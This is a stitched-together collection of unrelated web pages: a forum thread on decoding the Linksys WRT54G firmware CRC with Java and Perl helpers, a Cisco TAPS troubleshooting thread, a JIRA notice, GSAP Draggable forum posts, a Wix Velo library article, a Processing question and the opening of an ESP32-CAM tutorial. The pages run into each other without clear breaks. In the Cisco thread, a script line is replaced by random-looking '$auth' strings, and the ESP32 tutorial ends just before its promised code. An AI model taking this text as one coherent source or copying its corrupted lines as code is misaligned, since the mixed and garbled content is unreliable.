Hello--

I am very excited about your decision to include Linux and other GPL code in your recent 54G line. It appears from recent firmware updates that you have very interesting and ambitious plans for this line of equipment.

I was wondering if you have published the format of your firmware update files. Parts of it are obviously a CramFS archive and Linux kernel, as well as various header bits. I imagine a CRC of the file is involved for error checking purposes, and required for the AP to accept new firmware.

If the open source community were provided technical details about your firmware file format, I believe you would see an unprecedented interest in your 54G line. The ability to run custom Linux software on a commercial access point would certainly make it one of the most desirable access points on the market. The lack of documentation for the firmware header (particularly the CRC and other error checking) currently makes it difficult to fully customize the 54G line.
My particular interest is in extending your hardware to support NoCatAuth (), the open source captive portal implementation, as well as other community network oriented software. This may be outside the scope of your original plans for the 54G line, but please consider the potential benefit of providing the wireless community networkers with this information.

Best regards,
--Rob Flickenger

So, while we wait for a reply from Linksys/Cisco, who in the audience is good with bit math?

Had any luck dissecting the Linksys WRT54G firmware?

Hi, I'm trying to set up a free public WiFi hotspot in Birmingham, England. Trouble is that I *need* to have a "terms and conditions" page viewed and accepted by all users before they actually surf the web. The combination of the WRT54G and NoCatSplash seems like it would meet my requirement admirably. I'm therefore *very* interested to keep tabs on your progress. I'm not too familiar with firmware updates but I'm happy with compiling and running software using cygwin. Hopefully this will be enough to produce a customised "terms and conditions" page and upload it. Thanks for all your hard work!

Best Regards,
Dave Boden

But where are your broadcomm drivers?

When Linksys announced the release of the linux components I went and downloaded them, poking through looking to see if they had included any sort of driver for broadcomm's radio, but I didn't see anything. So, even if you were to get your new firmware onto the WRT54G, wouldn't you still be lacking support for the Radio/MAC?

But where are your broadcomm drivers?

The broadcomm drivers are in the firmware itself, in the form of loadable kernel modules. I can't see a good reason (yet) to change the kernel, but adding some open source software to the (mostly) open source firmware is very straightforward. Mount the CramFS, copy it out, add what you want, and build another one. But that is all to come, once this CRC issue is resolved.

Not sure whether this is what is needed...
/**
 * Utility to calculate what should be put in bytes 8..11
 * within linksys firmware. It takes the CRC32 of locations
 * 12..end and calculates what should be put in bytes 8..11.
 *
 * From
 *
 * 8..11 is the crc32 checksum of the file from location 12..end,
 * with the bits inversed. Ex: if the crc32 of the rest of the file
 * is 473D75C1, then locations 8..11 will be "3E 8A C2 B8".
 *
 * @author dave@emobus.com
 */
public class ConvertCRC {
    public static void main(String[] args) {
        if (args.length != 1 || args[0].length() != 8) {
            System.out.println("Usage: java -cp . ConvertCRC 473D75C1");
            return;
        }
        // input is definitely an 8 character string
        String input = args[0];

        // Get 4 bytes from the 8 characters on the command line
        byte[] crc32 = new byte[4];
        try {
            crc32[0] = (byte) Integer.parseInt(input.substring(0, 2), 16);
            crc32[1] = (byte) Integer.parseInt(input.substring(2, 4), 16);
            crc32[2] = (byte) Integer.parseInt(input.substring(4, 6), 16);
            crc32[3] = (byte) Integer.parseInt(input.substring(6, 8), 16);
        } catch (NumberFormatException ex) {
            System.out.println(input + " does not contain only hex numeric characters");
            return;
        }

        // Compile the output by moving the bits around:
        // swap the byte order and invert the bits (~ = not)
        byte[] output = new byte[4];
        output[0] = (byte) ~crc32[3];
        output[1] = (byte) ~crc32[2];
        output[2] = (byte) ~crc32[1];
        output[3] = (byte) ~crc32[0];

        System.out.println("Result is: "
                + toHexString(output[0]) + toHexString(output[1])
                + toHexString(output[2]) + toHexString(output[3]));
    }

    private static String toHexString(byte b) {
        String returnMe = Integer.toHexString(b);
        switch (returnMe.length()) {
            case 0:  return "00";
            case 1:  return "0" + returnMe;
            default: return returnMe.substring(returnMe.length() - 2, returnMe.length());
        }
    }
}
I've therefore been doing CRC checks on the firmware file after removing the first 1024 bytes: $ dd if=WRT54G_1.30.1_US_code.bin of=crcme bs=32c skip=32c I get a CRC32 of b2b654c8 and the size of the crcme file is 2740224, the same as what is reported in the header. Calculating the CRC Interesting idea. Unfortunately, the magic CRC is at 0x28-0x2C is 78 53 6C D5. I wonder if they're slicing it some other way to be 1k smaller and CRC'ing that... I noticed that about the reported file size as well (how it's 1024 smaller than the actual size.) Coincidentally, this always makes it end in 00 in big endian (29D000), and has for all three versions of the firmware I could find. Thanks for the code! And for those playing at home who prefer perl to java, here's the crc program I'm using: #!/usr/bin/perl use String::CRC32; scalar(@ARGV) || die "Usage: crc32 [file]\n"; for my $file (@ARGV) { open(SOMEFILE, "<$file") || die "Couldn't open $file: $!\n"; $crc = crc32(*SOMEFILE); close(SOMEFILE); print sprintf('%08x',$crc) . " $file (" . sprintf('%08x', (0xffffffff - $crc)) . ")\n"; } The first number reported is the CRC32, the second (in parenthesis at the end) is the one's complement. Calculating the CRC Good to see that the Seattle Wireless guys seem to have solved it: $ dd if=WRT54G_1.30.1_US_code.bin of=crcme bs=1c skip=44c count=2740212c Gives you a CRC of: 2a93ac87 When you flip the bits and 1s compliment (using the bit of Java that I posted if you wish) you get the required 78536CD5. Looks like you strip the 0xFF values from the end of the file (leaving the 0x00 padding where it is) and then take the CRC from byte 44 to the new end of the file. Cheers, Dave WRT55AG Dunno, if anyone noticed, but the Linksys WRT55AG (tri-mode router) is running linux, too.. 
Imre Kaloz

Close look up in Paris

Hi, here in Paris wifi man (joke, roaming on O'Reilly) and his sidekicks are very interested in the development of a custom-made firmware with NoCatSplash and, why not, a mesh networking protocol on the blue/black box delivered by Linksys. But I've been trying to understand SeattleWireless' pages about what has been done and where it stands now, and I must confess I have some trouble getting it (surely a language fence :) So where is it now? We are on the starting blocks here in Paris to set it up.

WEP/WPA Splash Screen

Would it be possible for me to, instead of locking out people without my key, let them connect... but if they are not using the key, when they try to go to a website they just get a page that basically tells them they need to connect using our keys, how to contact the netadmin, etc etc... Sounds like what I want to do would be similar to NoCatSplash, but isn't that basically just a terms/login system? That might suffice, but wouldn't it be better to use WPA and just tell them to enter the key? I don't know much about wifi technologies yet, I am trying to read up on it... but the fact that I can load stuff on my Linksys router should make this much easier...
http://www.oreillynet.com/etel/blog/2003/07/linux_on_the_linksys.html
I have set up TAPS as per the Cisco documentation and I cannot for the life of me work out what is going on. I can auto-register a phone and dial the TAPS Route Point and get redirected to one of the DNs, but I get the message "I'm sorry, we're currently experiencing system problems...". I have everything in the right partition / CSS, my RPs are registered, the AAR application is installed and the script is present. I have done a data check and sync and that all looks OK. What could be the issue here? Anyone have some ideas? UCCX 9 with UCM 9.0(2)

Could be a problem with AXL. Can you check a few things?

Anthony Holloway
Please use the star ratings to help drive great content to the top of searches.

I have just re-checked all the credentials - RMCM, JTAPI and AXL - all are definitely correct. How does one go about a reactive debug? I can see this in some MIVR traces that lead me to check the credentials:

5178: Oct 04 09:23:25.607 WST %MIVR-SS_RM-7-UNK:Processing msg: SessionTerminatedMsg (Rsrc:null ID:1034/1 Type:IAQ Cause:INVALID Abort))
5179: Oct 04 09:23:25.607 WST %MIVR-SS_CM-7-UNK:ContactMgr.getRmCmContact(1034/1) returns 16778250 [1034/1]
5180: Oct 04 09:23:25.607 WST %MIVR-SS_CM-7-UNK:ContactMgr.removeContactResourceTuple(1034/1) removing resource 9009
5181: Oct 04 09:23:25.607 WST %MIVR-SS_RM-7-UNK:RsrcMgr.removeContactFromCTIPort, port: 9009
5182: Oct 04 09:23:25.607 WST %MIVR-SS_CM-7-UNK:ContactMgr.getRmCmContact(1034/1) returns 16778250 [1034/1]
5183: Oct 04 09:23:25.608 WST %MIVR-SS_CM-7-UNK:RmCm contact 16778250[1034/1] (0) .removeConnectedResource(9009)
5184: Oct 04 09:23:25.608 WST %MIVR-SS_CM-7-UNK:RmCm contact 16778250[1034/1] (0) .dequeueAll(CONTACT_ABORTED)

Could there be a service not running on the CUCM that I need? (10.254.11.200 is my lab CUCM Publisher.)
9000 is my Trigger and 9001-9010 are the IVR ports. The script is not triggered on a reactive debug, so something else must be amiss.

That's good that you checked the credentials for those three accounts. Also, I actually meant your credentials on the TAPS application. However, looking at the TAPS script I can see that there are no credentials to supply, only the AXL server address. Did you supply this? And yes, the AXL service needs to be running on your AXL server (in most cases this is your Pub). Speaking of your Publisher, you mentioned your lab publisher. Is this UCCX your lab UCCX also, or production UCCX? If you know where I'm going with this, then you'll probably agree that this is a crazy question to ask, but then again, this is a public support forum, and anything is a possibility. No offense intended. Is it possible you are hitting the same issue as this person? A backwards compatibility issue?

Anthony Holloway
Please use the star ratings to help drive great content to the top of searches.

1) Yes, both devices
2) Ah OK, good to know. There is only the CUCM address to be specified. I've confirmed that I put in the publisher CUCM address, updated the script and the application, and restarted the engine service to the "IN SERVICE" state. The AXL service is running on the publisher - I can successfully create other objects (like CTI RPs etc). All applications mentioned are in a lab - nothing is in prod or mimicking an actual prod environment. The UCCX is version 9.0 and CUCM is 9.1(2) - according to all docs they should be compatible. I have only edited the TAPS script in the UCCX editor downloaded from the cluster. How does this "Default Script" work? What purpose does it serve? Thanks for your help!

Default Scripts are invoked when an exception occurs in the Main Script (simply called Script) of an Application. The System Default script is the one that plays the "I'm sorry, we're currently experiencing system problems..." message.
You can change it, but that's not necessary for what you are trying to do. So, back to restarting the Engine: did you initially do this after installing the TAPS.aar file? It loads a custom JAR file, and therefore the Engine needs to be restarted before it will work. Back to the credentials error in your log file: are you still seeing that, or is it cleared up now?

Anthony Holloway
Please use the star ratings to help drive great content to the top of searches.

Hi Tim, can you please check that the TAPS service in Call Manager is started?

199164: Oct 07 08:08:09.002 WST %MIVR-APP_MGR-6-ABORTING_CONTACT:Aborting contact: Application=TAPS,Task id=32000000001,Contact id=0,Contact implementation id=1038/1,Contact.cisco.call.CallContact,Contact Type=Cisco JTAPI Call)

From the error in the MIVR logs we can see that the connection is refused from Call Manager. If all the configuration is according to the documentation, then it might be an issue with the TAPS service in Call Manager.

Regards
Ravi

The TAPS service is definitely started and activated on the CUCM publisher. I have even restarted the Pub, just to be sure. Any other suggestions? What do I need to enable to trace TAPS issues on the CUCM side?

Having battled with this before, I can offer a short list of suggestions you might verify. These have helped me in the past.

1. Install a basic answer and queue script (grab one out of the repository). You'll need to create a CSQ for it to point to, but make sure it can answer the phone and talk to you. This will validate call control and IVR functionality.
2. On your TAPS script, you MUST enter the IP address of the CUCM Publisher server. Did you remember to do that? It will fail if it isn't there.
3. After you installed the TAPS.AAR file, did you REBOOT the UCCX server? I have found that not doing this is often the cause of many lost cycles. TAC even recommends that you reboot after installing the TAPS.AAR file.
After you've done the above 3, if it's still blowing up, you might want to use the UCCX editor and run a debug on the TAPS script to see if you can determine where it's blowing up. If you can figure out where, you can likely figure out WHY. Hope this helps. Cliff

OK, I've done the following:

1) A basic script worked just fine.
2) I can definitely confirm that I have entered the CUCM publisher IP address into the script within the application menu and within the script itself. The F5 debug on the script returns no syntax errors.
3) After removing everything then reinstalling the AAR file, I restarted the UCCX server and both the TAPS and BAT Provisioning services on CUCM.

I'm still seeing the same result and the same "permission denied" message in the trace files. Upon running the script with a reactive debug, it fails on the 9th line in, with the error message "Connection Refused to Host 10.254.11.200; nested exception... Permission denied" - basically the same as the trace file. This line is:

variable: $auth 7~&y!mI,%Qd(_cc.bcYbj7&=keL`N1mQ_=`vbS]v
objTAPS value: $auth j=&m!=8iNldNtKc#(Mq9B{s!3(LPNXd^_P`gQSqt { return (com.cisco.ccm.taps.service.TAPSIntf)java.rmi.Naming.lookup(rmiURL); }

I also upped the permissions on the RMCM and JTAPI user accounts to full admin privileges to see if this would make any difference: nothing changed.

Hmmm..... Dumb question here: Do you have forward AND REVERSE (A and PTR) records for both CUCM and UCCX in DNS? Hint: these are REQUIRED. Lots of folks forget about the PTR records, and they can cause all kinds of headaches..... Have you VERIFIED that they are available via NSLOOKUP pointed at the same DNS servers used by UCCX and CUCM?
Please use the below command to check DNS settings on UCCX and Call Manager: "utils network host <ipaddress/hostname of Call Manager/UCCX>"

It seems forward and reverse resolution from UCCX is working:

admin:utils network host LABCUCMPUB
Local Resolution: Nothing found
External Resolution: LABCUCMPUB.voicelab.local has address 10.254.11.200

admin:utils network host LABUCCX01
Local Resolution: LABUCCX01.voicelab.local resolves locally to 10.254.11.220
External Resolution: LABUCCX01.voicelab.local has address 10.254.11.220

admin:utils network host 10.254.11.200
Local Resolution: Nothing found
External Resolution: 200.11.254.10.in-addr.arpa domain name pointer labcucmpub.voicelab.local.

admin:utils network host 10.254.11.220
Local Resolution: 10.254.11.220 resolves locally to LABUCCX01.voicelab.local
External Resolution: 220.11.254.10.in-addr.arpa domain name pointer labuccx01.voicelab.local.

And on CUCM:

admin:utils network host LABCUCMPUB
Local Resolution: LABCUCMPUB.voicelab.local resolves locally to 10.254.11.200
External Resolution: LABCUCMPUB.voicelab.local has address 10.254.11.200

admin:utils network host LABCUCMUCCX01
Local Resolution: Nothing found
External Resolution: No external servers found

admin:utils network host LABUCCX01
Local Resolution: Nothing found
External Resolution: LABUCCX01.voicelab.local has address 10.254.11.220

admin:utils network host 10.254.11.200
Local Resolution: 10.254.11.200 resolves locally to LABCUCMPUB.voicelab.local
External Resolution: 200.11.254.10.in-addr.arpa domain name pointer labcucmpub.voicelab.local.

admin:utils network host 10.254.11.220
Local Resolution: Nothing found
External Resolution: 220.11.254.10.in-addr.arpa domain name pointer labuccx01.voicelab.local.

Both are pointing at the same Windows DNS server, where there are A records and PTR records for each machine in the lab.

What is the package of UCCX - Standard/Premium/Enhanced?

Premium on demo licences (as it's a lab)

OK... those look right.
When you go to CUCM and pull up the application user for the AXL account used by UCCX, when you scroll to the bottom, what roles and permissions do you see on it? I always just make mine a member of the Standard Tab Sync group, and that gets it what it needs, but what do you have? And on the CUCM server, could you log into the CLI, run the command UTILS SERVICE LIST, and post the results? And just to confirm: the TAPS.AAR file you uploaded to UCCX came off of the SAME CUCM server you're connected to and wanting to run TAPS with, correct?

Definitely the same CUCM I downloaded the .aar file from.

CUCM Publisher (10.254.11.200) Services:

DHCP Monitor Service[STARTED]
Cisco DRF Local[STARTED]
Cisco DRF Master[STARTED]
Cisco Database Layer Monitor[STARTED]
Cisco Dialed Number Analyzer[STARTED]
Cisco Dialed Number Analyzer Server[STARTED]
Cisco DirSync[STARTED]
Cisco E911[STARTED]
Cisco ELM Admin[STARTED]
Cisco ELM Client Service[STARTED]
Cisco ELM DB[STARTED]
Cisco ELM Server Messaging Interface[STOPPED] Component is not running
Cisco RIS Data Collector[STARTED]
Cisco RTMT Reporter Servlet[STARTED]
Cisco SOAP - CDRonDemand Service[STARTED]
Cisco SOAP - CallRecord Service[STARTED]
Cisco Serviceability Reporter[STARTED]
Cisco Syslog Agent[STARTED]
Cisco TAPS Service]
System Application Agent[STARTED]
Cisco ELM Resource API[STOPPED] Service Not Activated
Primary Node =true

AXL User Roles:
Standard AXL API Access (created by me)
Standard CTI Enabled
Standard TabSync User (only just added now, need to test)

Any new ideas on this one, guys? I'm at the end of my tether with this one!!! :S I have exactly no idea why this will not work!!!

Looking back through your thread, I didn't see a couple of things:
1. On the UCCX server, if you type SHOW VERSION ACTIVE, what does it return?
2. On the CUCM server, if you type SHOW VERSION ACTIVE, what does it return?
3. Can you please post a screen shot showing the step where it's failing in the script?
4.
Did you try rebuilding the UCCX server (you said it's a lab box)?
5. Have you done ANY hacks on either server? Not judging, but need to know.

I've got a UCCX box at the latest release, and I think my lab CUCM is the latest release as well. Glad to validate the issue with you.

I've taken this over from Tim - the UCCX and CUCM have been rebuilt, and we're seeing exactly the same issue. I've run through the suggestions/checks in this thread, and everything looks OK config-wise... Refer below for the additional information requested. Note that similar symptoms were reported here: - can anyone confirm they have TAPS working with UCCX/CUCM 9?

1. On the UCCX server, if you type SHOW VERSION ACTIVE, what does it return?
admin:show version active
Active Master Version: 9.0.1.10000-10
Active Version Installed Software Options: No Installed Software Options Found.

2. On the CUCM server, if you type SHOW VERSION ACTIVE, what does it return?
admin:show version active
Active Master Version: 9.1.1.10000-11
Active Version Installed Software Options: No Installed Software Options Found.

3. Can you please post a screen shot showing the step where it's failing in the script?

4. Did you try rebuilding the UCCX server (you said it's a lab box)?
The UCCX server (and CUCM cluster) have been rebuilt - IPs/hostnames etc. have changed - the new CUCM Pub IP is 10.254.11.10.

5. Have you done ANY hacks on either server? Not judging, but need to know.
No changes other than IPs/hostnames and basic CUCM config...

Sam.

I had missed in the beginning that this is running on v9. Thanks for providing the screenshot. It does validate some of what I was wondering about. The TAPS script is failing on the step where it's starting the Java object that communicates back with CUCM. I haven't checked the bug list for this one (did you?). Also, I realize this is a lab, but do you also have a production system here, or is this a learning environment only, where there is no production system?
I ask because availability of TAC resources is affected by whether or not there is a support contract in place on the production system. Lastly, there are later versions of BOTH CUCM and UCCX software available. Have you tried doing this with a later version (where the issue might have been addressed)? Cliff
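As an aside, the forward/reverse (A and PTR) consistency check that this thread keeps coming back to can be expressed as a small sketch. This is a hypothetical illustration using the lab names from the nslookup output in the thread, with the resolver simulated by dictionaries; a live check would instead call socket.gethostbyname() and socket.gethostbyaddr() against the same DNS server UCCX and CUCM actually use:

```python
# A/PTR records as they should exist for the lab in this thread.
A_RECORDS = {
    "labcucmpub.voicelab.local": "10.254.11.200",
    "labuccx01.voicelab.local": "10.254.11.220",
}
PTR_RECORDS = {ip: host for host, ip in A_RECORDS.items()}


def check_forward_reverse(host: str) -> bool:
    """Forward-resolve the host, reverse-resolve the answer, and confirm
    the PTR record points back at the same name (A and PTR agree)."""
    ip = A_RECORDS.get(host.lower())
    if ip is None:
        return False  # missing A record
    return PTR_RECORDS.get(ip, "").lower() == host.lower()
```

A host that only has an A record (or whose PTR points at a different name) fails the check, which is exactly the misconfiguration the posters above are warning about.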
https://supportforums.cisco.com/t5/contact-center/taps-quot-currently-experiencing-system-problems-quot/td-p/2327092
ASF GitHub Bot commented on GEARPUMP-339:
-----------------------------------------

GitHub user manuzhang opened a pull request: [GEARPUMP-339] Add ScalaDoc to Streaming DSL plan_doc

Alternatively you can review and apply these changes as the patch at:

To close this pull request, make a commit to your master/trunk branch with (at least) the following in the commit message: This closes #212

----
commit c2446fb54fce1ce727243be45391710d4a0dee0f
Author: manuzhang <owenzhang1990@gmail.com>
Date: 2017-08-05T16:56:18Z

[GEARPUMP-339] Add ScalaDoc to Streaming DSL
----

> Improve ScalaDoc for all public classes
> ---------------------------------------
>
> Key: GEARPUMP-339
> URL:
> Project: Apache Gearpump
> Issue Type: Improvement
> Affects Versions: 0.8.4
> Reporter: Manu Zhang
> Assignee: Manu Zhang
>
> All public classes should have ScalaDoc and any warnings should be fixed.

--
This message was sent by Atlassian JIRA (v6.4.14#64029)
http://mail-archives.apache.org/mod_mbox/gearpump-dev/201708.mbox/%3CJIRA.13092672.1501925950000.101412.1502001360076@Atlassian.JIRA%3E
- Sorry, you are correct, I didn't mean to confuse the situation! It is another potential solution to the main problem - that a user can get completely stuck - and it would provide a way they could scroll out of the draggable area to pinch and zoom. Easiest to demonstrate on CodePen: So with the draggable area larger than the container, it'd be great if AutoScroll could be set to scroll the body when it reaches the edge of the container. I hope this helps to clarify, but I'm happy to start a new topic if this is not the best place to suggest this as an alternative way of preventing a user getting stuck. Sorry for my delayed reply as well!

- What about the idea of scrolling the next scrollable parent (perhaps defined by the user) instead of bouncing if already at the container boundary? If enabled, it could default to scrolling the body. Similar to a scrollable div in iOS with -webkit-overflow-scrolling:touch applied.

- Fair enough, thanks Jack. I'll go down the route of disabling pinch zooms through JS if possible.

- Or alternatively... you could have a setting so that when you reach the boundary, the touch move behaviour could scroll another element (by default the body, perhaps). Kind of like how iOS scrollable elements work. You can scroll to the end, you get a bounce, but when the bouncing stops, if you then try and scroll down, the next parent element which is scrollable will start scrolling. That way at least you could get out of the area where you cannot pinch-zoom. (Wouldn't work for Google Maps, but I don't know if anyone is using draggable for an infinite-sized canvas.)

- It's almost as if Apple have done something silly by not allowing developers to easily prevent zooming on mobile layouts. It does seem like it may not be possible if the first touch has to have default behaviours prevented.
The only thing I could think of is allowing a user to only zoom if both touches are simultaneous. Also, perhaps delaying the preventDefault() call by 200-300 ms to see if there's a second touch, but I'm not sure if that'd work either.

- Jonathan: The behaviour is easily replicated on any draggable element in all existing demos. The difference is that the draggable element in our site is a large area. But essentially what I need to work out is whether I can perform native zooming with the touches starting on the draggable element. You can't zoom in or out when touching the draggable element, but if I zoom in on the page and then scroll into a large area where the draggable element fills the screen, a user wouldn't then be able to zoom out or scroll away.

Jack: Thank you very much - I imagine it'd be a task and perhaps not possible, but I thought it was worth asking the question. Thank you for your response. My other option is to disable pinch zooming using javascript, which I think will be OK if there isn't another workaround. Thanks both! Sorry for my delayed reply..

Draggable - Android issue clicking links with dragClickables:true
Silverback IS replied to Silverback IS's topic in GSAP

If it helps anyone else: I've also found out that if you have a link surrounding an SVG shape/polygon, adding touchstart/touchend events to the shape or the link seems to result in the link having to be clicked many times on Chrome for Android. As a result, I will have to use those events and detect the distance moved manually to trigger a click-like event. Probably a browser bug.

Draggable - Android issue clicking links with dragClickables:true
Silverback IS replied to Silverback IS's topic in GSAP

After stripping out the draggable plugin until the links were working again, I've built it back up and realise the solution by OSUBlake is great and fixes the issue - thank you!
Firstly, I had read that the xlink namespace was deprecated, but by not using the namespace, the links surrounding the SVG shapes were not clickable even without initialising the draggable plugin. So I got the links working again without draggable, and then the fun began. Without the 'allowEventDefault' value being true, not even the onClick event on Draggable will fire. By setting it to true, I can get the onClick from Draggable and the click event on the links themselves. I've only enabled that for Android mobile devices so far (very useful mobile detection scripts here). I have more testing to do on Explorer/Edge, but thanks for helping get to this stage!

Draggable - Android issue clicking links with dragClickables:true
Silverback IS replied to Silverback IS's topic in GSAP

I've just tried that, which didn't work unfortunately - but thank you for the help. I imagine it is to do with how I've structured my HTML and the way I'm positioning the SVG shapes with a link surrounding them. Even though in the inspector I can hover over the links and they appear to be there and in the correct place, I have a feeling it's got something to do with it. I'm setting up a test page on my site where I can continue to play step-by-step with what works and what doesn't. I don't know at what point it stopped working, but it may have even been a browser update or something. If I take draggable off completely, those links don't appear to be clickable on the Android devices. I can see now from experience that Android Chrome is very odd with how it handles touch/click events. I'll be back on here when I figure it out

Draggable - Android issue clicking links with dragClickables:true
Silverback IS replied to Silverback IS's topic in GSAP

Thanks very much for this, it's been very helpful - it's revealed there must be something else interfering somehow. The onClick handler on draggable has the same behaviour issue, where the triggerElement needs to be tapped multiple times to trigger the event.
I can see the CodePen works well, though, so it cannot be an issue with Greensock. Allowing the default event doesn't make a difference either. It is strange, because once I manage to trigger that event, the click event triggers without an issue as long as I haven't dragged the area; as soon as I drag the element again, I have to tap lots of times. I'll keep plugging away at it. Thanks again!

Draggable - Android issue clicking links with dragClickables:true
Silverback IS replied to Silverback IS's topic in GSAP

For more information, it appeared to work once on the device - but it may be similar to our website, where the click functionality works before the element has been dragged a first time.

Draggable - Android issue clicking links with dragClickables:true
Silverback IS replied to Silverback IS's topic in GSAP

Hi, I've created a codepen here: With this simple implementation I can put an event on the clickable element inside the draggable element which triggers a popup. This works on iOS and desktop but fails on Chrome on Android. This can be replicated on an S7 Edge running the latest OS and a Samsung S5 on OS 6.0.1 - Chrome on the S5 is version 52.0.2743.98. It'd be great if you can help by letting me know if there's a more recommended way of implementing this functionality. Thanks again. Daniel

Draggable - Android issue clicking links with dragClickables:true
Silverback IS replied to Silverback IS's topic in GSAP

Thanks Carl, it may be easier for me to strip back our current site and test step by step. If I find anything useful that may be beneficial to the rest of the community I'll definitely post it here - and if I can find a simple way to recreate the problem I'll create a CodePen. Thank you for your very prompt reply.

Draggable - Android issue clicking links with dragClickables:true
Silverback IS replied to Silverback IS's topic in GSAP

I forgot to say, but the 'onClick' event on the draggable instance has the same problem.
Please let me know if any more code would be helpful - thanks again.
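For reference, the manual tap detection mentioned earlier in the thread (firing a click-like event only when the finger barely moved between touchstart and touchend) boils down to a distance check. A minimal, language-agnostic sketch with a hypothetical 10 px threshold (the threshold value is an assumption, not something the thread specifies):

```python
import math

# Hypothetical threshold: a touch that moved less than ~10 px between
# touchstart and touchend is treated as a tap rather than a drag.
TAP_MAX_DISTANCE_PX = 10.0


def is_tap(start_xy, end_xy, max_distance=TAP_MAX_DISTANCE_PX):
    """Classify a touchstart/touchend pair: True means synthesize a click,
    False means treat the gesture as a drag and do nothing extra."""
    dx = end_xy[0] - start_xy[0]
    dy = end_xy[1] - start_xy[1]
    return math.hypot(dx, dy) < max_distance
```

In the actual page this logic would live in the touchend handler, using the coordinates recorded at touchstart.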
https://staging.greensock.com/profile/36905-silverback-is/
Velo by Wix: The utils for repeated item scope event handlers

npm library with utils for event handlers in a Repeater

In the article "Event handling of Repeater Item", we considered how to handle events in repeater items and why we shouldn't nest event handlers inside the Repeater loop. There we created a code snippet that encapsulates the logic for receiving the item selector and item data. Copying and pasting the snippet of code isn't comfortable. Therefore I moved these little helpers to the npm package repeater-scope. You can install this package using the Package Manager.

There is a method available that can automatically find the parent Repeater from the fired event object.

import { useScope } from 'repeater-scope';

$w.onReady(() => {
  $w('#repeatedButton').onClick((event) => {
    const { $item, itemData, index, data } = useScope(event);

    $item('#repeatedText').text = itemData.title;
  });
});

Returned parameters:

- $item - A selector function with repeated item scope.
- itemData - The object from the repeater's data array that corresponds to the repeated item being created.
- index - The index of the itemData object in the data array.
- data - The repeater's data array.

How it works

useScope(event) accepts an Event object. With the Event object, we can get the target element. It's the element that the event was fired on. Also, we can get the type and parent element of any editor element.

// Gets the element that the event was fired on.
const targetElement = event.target;

// Gets the element's parent element.
const parentElement = event.target.parent;

// Gets the element's type.
const elementType = event.target.type;

First, let's find the parent repeater of the child item where the event was handled. We will climb up the parent elements until we get a $w.Repeater element.

let parentElement = event.target.parent;

// Check the parent element type.
// If it isn't a Repeater, take the next parent of the parent element.
while (parentElement.type !== '$w.Repeater') {
  parentElement = parentElement.parent;
}

We get the repeater data array directly from the repeater property.

const data = parentElement.data;

We have the itemId in the event context object. With this ID we can find the current itemData and index where the event was fired from.

// ID of the repeater item where the event was fired from
const itemId = event.context.itemId;

// Use the Array methods to find the current itemData and index
const itemData = data.find((i) => i._id === itemId);
const index = data.findIndex((i) => i._id === itemId);

And last, we create a selector function for the target element. We can use the event context with $w.at() to get a selector function.

// Gets a selector function
// which selects items from a specific repeater item
const $item = $w.at(event.context);

Any questions?

If you have any issues, such as bugs, feature requests, and more, please contact me via a GitHub Issue or my personal Twitter. I hope this small library will be helpful in your projects too.
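For readers who want the algorithm without the Velo specifics, the two ideas inside useScope() — walk up .parent links until a '$w.Repeater' is found, then look the item up by its _id — can be sketched abstractly. The Element class and scope_for() helper below are illustrative stand-ins, not part of the repeater-scope package:

```python
class Element:
    """Minimal stand-in for an editor element with .type and .parent."""

    def __init__(self, type_, parent=None):
        self.type = type_
        self.parent = parent


def find_parent_repeater(element):
    """Climb .parent links until an element of type '$w.Repeater' is found,
    mirroring the while loop above; returns None if there is no repeater."""
    node = element.parent
    while node is not None and node.type != "$w.Repeater":
        node = node.parent
    return node


def scope_for(data, item_id):
    """Find the itemData object and its index for the item the event fired in,
    like the data.find()/data.findIndex() calls above."""
    item_data = next((i for i in data if i["_id"] == item_id), None)
    index = next((n for n, i in enumerate(data) if i["_id"] == item_id), -1)
    return item_data, index
```

The sketch also makes the failure mode explicit: an event fired outside any repeater yields None, which the real library guards against by only being used inside repeater item handlers.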
https://shoonia.site/the-utils-for-repeated-item-scope-event-handlers
I have been working with Processing for only a short time. I always get this error message:

Usage: PApplet <appletname>

For example, I am using these two Java files in a project:

Main.java:

package de.hpi.javaide.firststeps;

import processing.core.PApplet;

public class Main {
  public static void main(String[] args) {
    PApplet.main(new String[]{"--present", "de.hpi.javaide.firststeps.Game"});
  }
}

Game.java:

package de.hpi.javaide.firststeps;

import processing.core.PApplet;

@SuppressWarnings("serial")
public class Game extends PApplet {
  @Override
  public void setup() {
    noStroke();
    fill(255, 10, 10);
    rectMode(CORNER);
    rect(5, -100, 20, 10);
  }

  @Override
  public void draw() {
  }
}

These files come from a course at openHPI. Last year Processing worked without any problem. Now I get the error shown above when using any Java file that uses Processing. I am using Eclipse Neon, Java version "1.8.0_161" and core.jar (version 3). Any help appreciated! Thanks in advance for your help!

Answers

I suspect the problem is that the source code you are working with is written for Processing 2. With Processing 3 and Eclipse Neon your Game class should look like this

Thank you very much for your answer. I suspected this also as a cause of my problem. But the solution to the problem was that, when clicking 'Run' in Eclipse, you have to configure 'Run' and select 'Main.java'. When just clicking 'Run', 'PApplet.java' is used, for whatever reason. Doing so, it works nevertheless using 'setup()' and not 'settings()'. Thanks for your quick support. I have learned some new things.
https://forum.processing.org/two/discussion/27648/error-message-usage-papplet
Learn how to take photos with the ESP32-CAM board and save them to a microSD card using the Arduino IDE. When you press the ESP32-CAM RESET button, it wakes up, takes a photo and saves it to the microSD card. We'll be using the ESP32-CAM board labelled as the AI-Thinker module, but other modules should also work by making the correct pin assignments in the code. The ESP32-CAM board is a $9 device (or less) that combines an ESP32-S chip, an OV2640 camera, a microSD card slot and several GPIO pins.

For an introduction to the ESP32-CAM, you can follow the next tutorials:

- ESP32-CAM Video Streaming and Face Recognition with Arduino IDE
- ESP32-CAM Video Streaming Web Server (works with Home Assistant, Node-RED, etc…)
- ESP32-CAM Troubleshooting Guide

Watch the Video Tutorial

To learn how to take photos with the ESP32-CAM and save them to the microSD card, you can watch the following video tutorial or keep reading this page for the written instructions and all the resources.

Parts Required

To follow this tutorial you need the following components:

- ESP32-CAM with OV2640
- MicroSD card

Here is a quick overview of how the project works:

- The ESP32-CAM is in deep sleep mode
- Press the RESET button to wake up the board
- The camera takes a photo
- The photo is saved to the microSD card with the name pictureX.jpg, where X corresponds to the picture number
- The picture number is saved in the ESP32 flash memory so that it is not erased during RESET and we can keep track of the number of photos taken

Format the microSD card as FAT32. A new window pops up. Select FAT32, press Start to initialize the formatting process and follow the onscreen instructions.

You can follow one of the next tutorials to install the ESP32 add-on, if you haven't already:

- Installing the ESP32 Board in Arduino IDE (Windows instructions)
- Installing the ESP32 Board in Arduino IDE (Mac and Linux instructions)

Take and Save Photo Sketch

Copy the following code to your Arduino IDE.
